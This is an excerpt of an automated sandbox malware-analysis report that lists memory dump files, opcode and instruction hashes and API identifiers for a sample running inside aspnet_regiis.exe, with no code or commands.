• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7b5d740ace398df56c1bc651b30677a1090a792db8fb55b3a5b1b7746f8ad41c
• Instruction ID: 60224ad1a7cf9c2ac8d3ac8e7eed38d170d8b361f20b4f166a918f7cfcf20c19
• Opcode Fuzzy Hash: 7b5d740ace398df56c1bc651b30677a1090a792db8fb55b3a5b1b7746f8ad41c
• Instruction Fuzzy Hash: B9019EB160070597E6118E1FD5C0B27B6BA6FA5708F28042CE80787301EB76E8098AAA
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
                                                                                                                                                                                                                                                                  • Instruction ID: d3bd9c844f43136b87188ccf00dea569b272b483eb3ae9966e9e13c5e9ac3489
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFF04460104B914AD3328F39C5243A3BFF09F2321CF542A8CC5D7576E2D776E10A8798
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                                                                                                                                                                  • Instruction ID: 190db2f54bf8934c4cd2efffe8f83a59de6cf40248b7a73a2d57218dfac670ea
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CF030104087E28AD7174A3F89607A3AFE19BA3021B241BD5C8F29B2CBC215D097C3A9
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                  • String ID: C$C$P$T
                                                                                                                                                                                                                                                                  • API String ID: 2610073882-3051599793
                                                                                                                                                                                                                                                                  • Opcode ID: 6ad76f1a5535b822f79293fae76517af97870f7b8dbe3a15fbbab24a5a3246da
                                                                                                                                                                                                                                                                  • Instruction ID: faafa1809ca61f4a907b4926b04c391afb57e7550de5d33ba98e9cc2c3b1b48d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ad76f1a5535b822f79293fae76517af97870f7b8dbe3a15fbbab24a5a3246da
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D41C32010C7C18AD372DB38845979FBFE16BA6224F488A9DD4ED8B3D2DB754049DB63